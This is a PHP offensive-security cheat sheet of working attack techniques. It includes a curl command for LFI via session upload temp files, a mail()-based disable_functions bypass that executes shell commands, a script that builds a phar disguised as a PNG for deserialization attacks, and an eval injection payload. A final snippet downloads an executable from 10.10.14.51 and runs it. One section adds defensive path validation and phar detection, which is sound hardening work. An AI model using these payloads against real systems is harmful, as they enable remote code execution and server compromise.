
PHP

Dangerous Functions

PHP Temporary Files

PHP creates temporary files for files sent via POST and for session data. If we have an LFI, this is a way to get our PHP code onto the box and then include it.

PHP_SESSION_UPLOAD_PROGRESS (creates /tmp/sess_xct, the session file named after the PHPSESSID cookie):

curl --path-as-is '127.0.0.1/' -F 'PHP_SESSION_UPLOAD_PROGRESS=<payload' -F '[email protected]' -H 'Cookie: PHPSESSID=xct';

Disable Functions Bypass

Mail

The fifth argument of mail() is handed to the sendmail binary as additional command-line options, which is what this abuses:

<?php
file_put_contents('/tmp/exploit',"whoami>/tmp/output");
mail("a","b","c","d","-H 'bash /tmp/exploit'");
?>

PHP7 Backtrace

Interesting Behavior

PHP's $_REQUEST merges values from $_GET, $_POST and also $_COOKIE, with the precedence set by request_order (later sources override earlier ones). This can lead to some interesting behavior when the same parameter is set to different values in GET/POST and in a COOKIE. Values from COOKIE are disabled by default though (request_order = "GP" in the shipped php.ini).

PHAR SSRF

If file_exists() or a similar filesystem function is called on a path we control (e.g. uploaded content), we can point it at the phar:// wrapper; PHP then unserializes the phar's metadata, which lets us use deserialization gadgets.

<?php
// Build a phar whose metadata carries the serialized gadget object. $prefix is
// prepended to the stub (and to the test file) so the result also passes naive
// image checks; the stub still has to end in __HALT_COMPILER().
function generate_base_phar($o, $prefix){
    global $tempname;
    @unlink($tempname);
    $phar = new Phar($tempname);
    $phar->startBuffering();
    $phar->addFromString("test.txt", "$prefix xct_was_here");
    $phar->setStub("$prefix<?php __HALT_COMPILER(); ?>");
    $phar->setMetadata($o);          // unserialized when the phar is touched via phar://
    $phar->stopBuffering();
    $basecontent = file_get_contents($tempname);
    @unlink($tempname);
    return $basecontent;
}

$object = new <Your Class>;          // placeholder: the gadget class to instantiate
var_dump(serialize($object));
# prefix for faking a valid png
$prefix = "\x89\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\x00\x05\x0a\x00\x00\x01\x56";
$tempname = 'temp.phar';             // Phar requires a .phar extension while building
$outfile = 'out.png';
file_put_contents($outfile, generate_base_phar($object, $prefix));

If no good gadgets are available, the built-in SoapClient class can be used for SSRF (e.g. via the gopher:// wrapper) against other local services such as MySQL.
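The defensive counterpart to the trick above, added here as an example and not part of the original notes: validate the caller-supplied path before it reaches file_exists(), and reject uploads that carry a phar stub. The names $uploadDir, $_GET['f'] and the uploads/ directory are assumptions.

```php
<?php
// Added defensive example (not from these notes): make sure a user-controlled
// path can never be a stream wrapper such as phar:// by the time a filesystem
// function sees it. $uploadDir and $_GET['f'] are assumed names.
// Background: on PHP < 8.0 any filesystem call on a phar:// path unserializes the
// archive's metadata; PHP >= 8.0 only does so on an explicit Phar::getMetadata().

function safeUploadPath(string $userPath, string $uploadDir): ?string
{
    // Reject any scheme/wrapper prefix (phar:, php:, data:, file:, ...).
    // This also rejects Windows drive letters, which is fine: only paths
    // relative to the upload directory are accepted.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $userPath)) {
        return null;
    }
    // Reject NUL bytes and ".." components before touching the filesystem.
    if (strpos($userPath, "\0") !== false
        || preg_match('#(^|[\\\\/])\.\.([\\\\/]|$)#', $userPath)) {
        return null;
    }
    // Resolve and confine to the upload directory; realpath() returns false
    // for paths that do not exist, so a missing file is rejected here too.
    $base = realpath($uploadDir);
    $full = realpath($uploadDir . DIRECTORY_SEPARATOR . $userPath);
    if ($base === false || $full === false
        || strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $full;
}

// Upload-time check: a phar must carry "__HALT_COMPILER();" in its stub no
// matter what fake PNG/JPEG header is prepended, so refuse content containing it.
function looksLikePhar(string $content): bool
{
    return stripos($content, '__HALT_COMPILER') !== false;
}

// Usage at the lookup point that previously called file_exists($_GET['f']).
$path = safeUploadPath($_GET['f'] ?? '', __DIR__ . '/uploads');
if ($path === null) {
    http_response_code(400);
    exit('invalid path');
}
$exists = file_exists($path); // now only ever a plain path inside uploads/
```

Where the application never needs phar archives at all, calling stream_wrapper_unregister('phar') at startup removes the wrapper entirely and is the simpler hardening.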

Eval Code Injection

Simple but effective when the input lands inside a double-quoted string that is passed to eval(), since `${...}` is interpolated and executed:
${system($_GET[1])}&1=ls

Upload & Execute File

<?php
$data = file_get_contents("http://10.10.14.51/xc.exe");
file_put_contents( "C:\\programdata\\xc_10.10.14.51_8080.exe", $data);
system("C:\\programdata\\xc_10.10.14.51_8080.exe");
?>